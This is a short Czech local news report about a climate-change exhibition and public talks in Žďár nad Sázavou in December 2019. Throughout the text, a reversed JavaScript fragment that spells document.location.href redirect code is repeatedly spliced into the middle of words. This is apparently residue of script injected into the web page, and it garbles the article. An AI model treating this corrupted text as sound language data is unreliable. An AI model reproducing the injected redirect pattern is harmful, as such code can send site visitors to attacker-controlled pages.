Rainbow page separator

Žďár připravil výstavu a besedy týkající se klimatické změny

Pondělí, 9. prosince 2019

Žďár nad Sázavou / V Kině Vysočina mohou zájemci až do 20. prosince vidět pu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní výstavu Klima se mění. Změň se i ty! V úterý 17. prosince tam navíc dopoledne proběhne beseda pro školáky a odpoledne debata s veřejností na téma klimatických změn. Přednášku a následnou diskusi s obyvateli Žďáru povede Michal Žák, meteorolog České televize a klima[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolog z Matematicko-fyzikální fakulty Univerzity Karlovy v Praze.
Akce připravila žďárská radnice ve spolupráci s obecně prospěšnou společností CI2. Výstava i obě besedy jsou součástí projektu Klima se mění: od informací k akci spolufinancovaného Státním fondem životního prostředí ČR. „V rámci [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to projektu jsme le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos připravili více jak deset besed ve středních a základních školách v různých koutech Česka a další chystáme na rok 2020. Při besedách klademe velký důraz na ukázku příkladů dobré praxe v oblasti klimatických opatření, aby mladí lidé měli možnost se s nimi seznámit, zhodnotit je a třeba se jimi nechat inspirovat. V nasbírání těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to příkladů nám pomohlo i nedávné natáčení dokumentu Česko chrání klima, při němž jsme opakovaně navštívili Vysočinu včetně Žďáru nad Sázavou. Veřejnosti bychom ho rádi představili na konci ledna 2020,“ sdělil Daniel Tichý ze společnosti CI2.